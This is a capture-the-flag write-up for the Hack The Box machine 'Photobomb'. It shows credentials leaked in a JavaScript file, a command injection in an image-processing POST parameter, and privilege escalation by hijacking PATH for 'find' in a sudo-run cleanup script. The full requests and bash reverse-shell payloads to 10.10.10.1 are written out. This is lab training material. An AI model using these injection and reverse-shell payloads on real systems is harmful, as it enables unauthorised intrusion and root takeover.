We are going to exploit Photobomb on Hackthebox.
After we inspected the Application we will find out that the Credentials for the enpoint /printer are leaked in a java script file.
To get a foothold we will exploit a command injection vulnerability in the image processor and escalate to root using sudo.
Enumeration
Rustscan
We will start by doing a quick scan using Rustscan and identify that Port 22 and 80 are open.
When we visit the site http://photobomb.htb we are greeted with a message that we have to click to get started. The credentials are in our welcome pack according to the site. Since we haven't received a "welcome pack" and get asked for a username and password on http://photobomb.htb/printer we inspect the application more and check photobomb.js
photobomb.js
Great we found credentials to visit the restricted section. There are two ways we can use that info
Set a cookie document.cookie="isPhotoBombTechSupport=1"
Use pH0t0:b0Mb! as credentials
functioninit() {// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing meif (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer'); }}window.onload = init;
/printer
On visiting http://photobomb.htb/printer there's not much to discover except some images that we can select, setting the file type, a resolution and a buttong to download photo to print. That's exactly what happens when we select an image and hit Download photo to print, after some time we are able to download a file.
Exploitation
Shell
Burp will help us to enumerate that behavior and request we are sending to the application further. We will discover that the Application takes three parameters and we're sending a POST request to the image processor backend.
POST Request
That's how the POST Request looks like when we just hit Download photo to print.
POST /printer HTTP/1.1Host:photobomb.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:222Origin:http://photobomb.htbAuthorization:Basic cEgwdDA6YjBNYiE=Connection:closeReferer:http://photobomb.htb/printerUpgrade-Insecure-Requests:1photo=finn-whelen-DTfhsDIWNSg-unsplash.jpg&filetype=png&dimensions=600x400
Command Injection
After playing around we discover that the filetype paramter seems to behave akward when we add ;id for example. Instead of generating an Image we get the message Failed to generate a copy of finn-whelen-DTfhsDIWNSg-unsplash.jpg Let's get a shell by executing a payload and don't forget to URL encode it.
POST /printer HTTP/1.1Host:photobomb.htbUser-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:en-US,en;q=0.5Accept-Encoding:gzip, deflateContent-Type:application/x-www-form-urlencodedContent-Length:222Origin:http://photobomb.htbAuthorization:Basic cEgwdDA6YjBNYiE=Connection:closeReferer:http://photobomb.htb/printerUpgrade-Insecure-Requests:1photo=finn-whelen-DTfhsDIWNSg-unsplash.jpg&dimensions=600x400&filetype=png;bash -c 'bash -i >& /dev/tcp/10.10.10.1/80 0>&1'
Escalation
Local Enumeration
During enumeration there was a possible privilege escalation vector discovered. We are able to run /opt/cleanup.sh as root and have privileges to set an enviroment variable.
#!/bin/bash./opt/.bashrccd/home/wizard/photobomb# clean up log filesif [ -s log/photobomb.log ] &&! [ -L log/photobomb.log ]then/bin/catlog/photobomb.log>log/photobomb.log.old/usr/bin/truncate-s0log/photobomb.logfi# protect the priceless originalsfindsource_images-typef-name'*.jpg'-execchownroot:root{} \;
Privilege Escalation
Checking /opt/cleanup.sh reveals that find is called without an absolute path to the binary and relies on the PATH environment variable. Let's create a new folder called bin in our home directory, a binary called find in our new folder containing a reverse shell payload
find
bash-c'bash -i >& /dev/tcp/10.10.10.1/81 0>&1
Make it executable and start cleanup.sh
sudo PATH=/home/wizard/bin:$PATH /opt/cleanup.sh
We will now receive a connection back on our listener and have a ROOT Shell